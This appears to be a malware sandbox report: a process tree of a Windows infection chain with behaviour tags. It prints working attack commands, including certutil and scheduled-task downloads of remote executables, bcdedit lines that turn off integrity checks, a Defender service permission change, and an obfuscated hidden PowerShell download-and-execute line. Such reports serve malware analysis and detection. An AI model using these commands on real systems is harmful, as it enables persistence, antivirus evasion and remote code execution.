C:\Users\Admin\AppData\Local\Temp\fdvhpnzd0uw\app.exe"C:\Users\Admin\AppData\Local\Temp\fdvhpnzd0uw\app.exe" /8-238⤵
- Executes dropped EXE
PID:4732 -
C:\Users\Admin\AppData\Local\Temp\fdvhpnzd0uw\app.exe"C:\Users\Admin\AppData\Local\Temp\fdvhpnzd0uw\app.exe" /8-239⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4920 -
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"10⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3772 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes11⤵PID:4848
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2310⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1360 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F11⤵
- Creates scheduled task(s)
PID:5236
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F11⤵
- Creates scheduled task(s)
PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"11⤵
- Loads dropped DLL
PID:4976 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER12⤵
- Modifies boot configuration data using bcdedit
PID:5096
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:12⤵
- Modifies boot configuration data using bcdedit
PID:5776
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:12⤵
- Modifies boot configuration data using bcdedit
PID:5440
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows12⤵
- Modifies boot configuration data using bcdedit
PID:5220
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe12⤵
- Modifies boot configuration data using bcdedit
PID:5060
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe12⤵
- Modifies boot configuration data using bcdedit
PID:2156
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 012⤵
- Modifies boot configuration data using bcdedit
PID:4900
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn12⤵
- Modifies boot configuration data using bcdedit
PID:3412
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 112⤵
- Modifies boot configuration data using bcdedit
PID:4516
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}12⤵
- Modifies boot configuration data using bcdedit
PID:4620
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast12⤵
- Modifies boot configuration data using bcdedit
PID:4916
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 012⤵
- Modifies boot configuration data using bcdedit
PID:2228
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}12⤵
- Modifies boot configuration data using bcdedit
PID:4444
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy12⤵
- Modifies boot configuration data using bcdedit
PID:4308
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v11⤵
- Modifies boot configuration data using bcdedit
PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe11⤵
- Drops file in Drivers directory
PID:5860
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"11⤵PID:696
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)12⤵PID:4864
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)13⤵PID:5324
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1yf1zpzotdp\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\1yf1zpzotdp\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4812 -
C:\Users\Admin\AppData\Local\Temp\is-KN9J6.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-KN9J6.tmp\IBInstaller_97039.tmp" /SL5="$7020E,14437942,721408,C:\Users\Admin\AppData\Local\Temp\1yf1zpzotdp\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5048 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
PID:4904
-
-
C:\Users\Admin\AppData\Local\Temp\is-QPOCF.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-QPOCF.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-QPOCF.tmp\{app}\chrome_proxy.exe"11⤵PID:4924
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:4664
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0qg4nfalfgx\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\0qg4nfalfgx\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4788
-
-
C:\Users\Admin\AppData\Local\Temp\2gnifpnopjx\3zfg0vwkmou.exe"C:\Users\Admin\AppData\Local\Temp\2gnifpnopjx\3zfg0vwkmou.exe" 57a764d042bf88⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4776 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\L7U58PP2FM\L7U58PP2F.exe" 57a764d042bf8 & exit9⤵PID:5132
-
C:\Program Files\L7U58PP2FM\L7U58PP2F.exe"C:\Program Files\L7U58PP2FM\L7U58PP2F.exe" 57a764d042bf810⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:5652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p5yulyzp3uy\vict.exe"C:\Users\Admin\AppData\Local\Temp\p5yulyzp3uy\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4764 -
C:\Users\Admin\AppData\Local\Temp\is-MBI9H.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-MBI9H.tmp\vict.tmp" /SL5="$60032,870426,780800,C:\Users\Admin\AppData\Local\Temp\p5yulyzp3uy\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5024 -
C:\Users\Admin\AppData\Local\Temp\is-ANASA.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-ANASA.tmp\wimapi.exe" 53510⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\visCsLiTc.exe"C:\Users\Admin\AppData\Local\Temp\visCsLiTc.exe"11⤵
- Loads dropped DLL
- Checks processor information in registry
PID:4580 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im visCsLiTc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\visCsLiTc.exe" & del C:\ProgramData\*.dll & exit12⤵PID:4536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visCsLiTc.exe /f13⤵
- Kills process with taskkill
PID:4448
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
PID:4692
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5364
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:4304
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ggaqhovbg1q\ocd50upzkg2.exe"C:\Users\Admin\AppData\Local\Temp\ggaqhovbg1q\ocd50upzkg2.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:4752 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 6529⤵
- Drops file in Windows directory
- Program crash
PID:4820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 6409⤵
- Program crash
PID:4148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 8049⤵
- Program crash
PID:5384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 8529⤵
- Program crash
PID:5540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 9009⤵
- Program crash
PID:5728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 9209⤵
- Program crash
PID:5144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 11809⤵
- Program crash
PID:4836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 11929⤵
- Program crash
PID:4680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 11569⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1048
-
-
-
C:\Users\Admin\AppData\Local\Temp\qhnqsq1ifwu\ehwyuqrbmky.exe"C:\Users\Admin\AppData\Local\Temp\qhnqsq1ifwu\ehwyuqrbmky.exe" testparams8⤵PID:4724
-
C:\Users\Admin\AppData\Roaming\ynhhxmexuws\g11uqjimrim.exe"C:\Users\Admin\AppData\Roaming\ynhhxmexuws\g11uqjimrim.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5168 -
C:\Users\Admin\AppData\Local\Temp\is-133RM.tmp\g11uqjimrim.tmp"C:\Users\Admin\AppData\Local\Temp\is-133RM.tmp\g11uqjimrim.tmp" /SL5="$30294,329392,58368,C:\Users\Admin\AppData\Roaming\ynhhxmexuws\g11uqjimrim.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\y1t0p2c5lti\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\y1t0p2c5lti\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\aromfkv1cn2\vpn.exe"C:\Users\Admin\AppData\Local\Temp\aromfkv1cn2\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\is-NMUIF.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-NMUIF.tmp\vpn.tmp" /SL5="$1032A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\aromfkv1cn2\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1868 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5944
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:3984
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5972
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4468 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Adds Run key to start application
PID:212
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vboyqzcssum\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\vboyqzcssum\askinstall24.exe"8⤵PID:5032
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:4532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:4736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yk0dbn1ezhh\safebits.exe"C:\Users\Admin\AppData\Local\Temp\yk0dbn1ezhh\safebits.exe" /S /pubid=1 /subid=4518⤵PID:4176
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\yk0dbn1ezhh\safebits.exe9⤵PID:6116
-
-
-
C:\Users\Admin\AppData\Local\Temp\coizeb25syj\vict.exe"C:\Users\Admin\AppData\Local\Temp\coizeb25syj\vict.exe" /VERYSILENT /id=5358⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\is-2R3N7.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-2R3N7.tmp\vict.tmp" /SL5="$204B2,870426,780800,C:\Users\Admin\AppData\Local\Temp\coizeb25syj\vict.exe" /VERYSILENT /id=5359⤵PID:4996
-
C:\Users\Admin\AppData\Local\Temp\is-L929U.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-L929U.tmp\wimapi.exe" 53510⤵PID:4944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\s3dh3jznyfq\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\s3dh3jznyfq\Setup3310.exe" /Verysilent /subid=5778⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\is-38AFP.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-38AFP.tmp\Setup3310.tmp" /SL5="$1201E4,802346,56832,C:\Users\Admin\AppData\Local\Temp\s3dh3jznyfq\Setup3310.exe" /Verysilent /subid=5779⤵PID:4620
-
C:\Users\Admin\AppData\Local\Temp\is-4E807.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4E807.tmp\Setup.exe" /Verysilent10⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\is-BG635.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BG635.tmp\Setup.tmp" /SL5="$4040C,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-4E807.tmp\Setup.exe" /Verysilent11⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\ProPlugin.exe" /Verysilent12⤵PID:4932
-
C:\Users\Admin\AppData\Local\Temp\is-1MAIQ.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-1MAIQ.tmp\ProPlugin.tmp" /SL5="$702B6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\ProPlugin.exe" /Verysilent13⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\is-6T5S5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6T5S5.tmp\Setup.exe"14⤵PID:4336
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"15⤵PID:908
-
C:\Windows\regedit.exeregedit /s chrome.reg16⤵
- Runs .reg file with regedit
PID:4092
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe16⤵
- Kills process with taskkill
PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\curl.execurl.exe "https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?ip=154.61.71.51&loc=US&app=Staoism&payoutcents=0.08&ver=3.5" -k16⤵PID:5040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat16⤵PID:5512
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)17⤵PID:4372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"18⤵PID:5888
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"19⤵PID:3628
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xbc,0xe0,0x7ffb4f466e00,0x7ffb4f466e10,0x7ffb4f466e2020⤵PID:5992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1860 /prefetch:820⤵PID:6160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1876 /prefetch:820⤵PID:6172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1808 /prefetch:220⤵PID:6152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:120⤵PID:6192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:120⤵PID:6184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3372 /prefetch:820⤵PID:6408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:120⤵PID:6420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3360 /prefetch:820⤵PID:6476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:120⤵PID:6460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4284 /prefetch:120⤵PID:6512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:120⤵PID:6504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4456 /prefetch:820⤵PID:6632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4416 /prefetch:820⤵PID:6688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:820⤵PID:6788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:820⤵PID:7108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3472 /prefetch:820⤵PID:5288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 /prefetch:820⤵PID:6700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:820⤵PID:3212
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings20⤵PID:6784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1768 /prefetch:820⤵PID:5524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4988 /prefetch:820⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1884 /prefetch:820⤵PID:6532
-
-
